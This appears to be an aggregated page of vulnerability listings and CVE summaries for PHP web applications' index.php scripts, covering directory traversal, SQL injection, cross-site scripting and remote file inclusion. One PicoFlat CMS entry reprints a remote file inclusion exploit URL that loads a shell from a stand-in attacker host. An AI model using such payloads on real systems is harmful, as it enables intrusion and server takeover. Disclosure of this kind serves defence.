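PHP File Sharing System Index.PHP Directory Traversal Vulnerability
PHP File Sharing System is a PHP-based web application. PHP File Sharing System does not properly filter user-supplied URI data, so a remote attacker can exploit the vulnerability to view the contents of system files with the privileges of the web server. The problem is that the 'index.php' script does not filter user-supplied web parameters: submitting parameter data containing "../" characters bypasses the web root restriction and allows system file contents to be viewed with the web server's privileges. PHP File Sharing System 1.5.1 No detailed solution is currently available: http://sourceforge.net/projects/phpfilesadmin/...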
CVE-2007-5485
SQL injection vulnerability in index.php in the mg2 1.0 module for KwsPHP allows remote attackers to execute arbitrary SQL commands via the album parameter...
CVE-2007-5485
CVE-2007-5485 affects the mg2 1.0 module for KwsPHP. The vulnerability is a SQL injection in index.php via the album parameter, allowing remote attackers to execute arbitrary SQL commands. Exploitation details are not provided in the connected documents; no specific exploit status or in-the-wild ...
[Full-disclosure] PHP File Sharing System 1.5.1
PHP File Sharing System - Directory traversal +--------------------------------------------+ Author: Jonas Thambert Date: 2007-10-13 URL: http://sourceforge.net/projects/phpfilesadmin/ Vendor Notified. Version: 1.5.1 latest - Description - PHP File Sharing System is vulnerable to directory...
Sql injection
SQL injection vulnerability in index.php in the newsletter module 1.0 for KwsPHP, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the newsletter parameter...
CVE-2007-5458
CVE-2007-5458 describes an SQL injection in index.php of the KwsPHP newsletter module 1.0. The vulnerability occurs when magic_quotes_gpc is disabled, allowing remote attackers to inject arbitrary SQL via the newsletter parameter. This is supported by multiple connected records (NVD/NVD listing, ...
Sql injection
SQL injection vulnerability in admin/index.php in Interspire ActiveKB 1.5 allows remote attackers to execute arbitrary SQL commands via the questId parameter in a hideQuestion ToDo action. NOTE: the catId vector is already covered by CVE-2007-5131...
CVE-2007-5425
SQL injection vulnerability in admin/index.php in Interspire ActiveKB 1.5 allows remote attackers to execute arbitrary SQL commands via the questId parameter in a hideQuestion ToDo action. NOTE: the catId vector is already covered by CVE-2007-5131...
picoflat-rfi.txt
PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny n00b-firends: Pucik and Steryd ; FUN B...
PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ==================================================================== PicoFlat CMS EXPLOIT: http://x.com/index.php?pagina=http://evil.org/shell.txt? 0day.today 2018-04-12...
PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion
PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny n00b-firends: Pucik and Steryd ; FUN B...
PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability
No description provided by source. PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny...
CVE-2007-5297
Cross-site scripting (XSS) vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter...
CVE-2007-5297
CVE-2007-5297 affects Minki 1.30, with a vulnerability in index.php where the page parameter enables cross-site scripting (XSS). The root cause is insufficient input handling in the affected script, allowing injection of arbitrary script/HTML by remote attackers. Public exploitation details or co...
CVE-2007-5295
CVE-2007-5295 affects Wikepage Opus 13 2007.2 and TipiWiki 2, via index.php. The underlying issue is multiple cross-site scripting (XSS) vulnerabilities that allow remote attackers to inject arbitrary script or HTML through the PageContent and PageName parameters. Reported impact per NVD is a Par...
CVE-2004-2688
Cross-site scripting (XSS) vulnerability in index.php in NewsPHP allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. NOTE: this issue might overlap vector 3 in CVE-2006-3358...
CVE-2004-2688
CVE-2004-2688 / CVE-2006-3358 describe multiple XSS vulnerabilities in NewsPHP’s index.php. The issue is triggered by unsanitized user input through the cat_id parameter (and other vectors in related CVEs), which can cause arbitrary web script/HTML to be injected and reflected in error pages. The...
CVE-2007-5235
The CVE-2007-5235 entry describes a Cross-site Scripting (XSS) vulnerability in Uebimiau, specifically in index.php for versions 2.7.2 through 2.7.10. The issue allows remote attackers to inject arbitrary web script or HTML via the f_email parameter. The provided documents do not include explicit...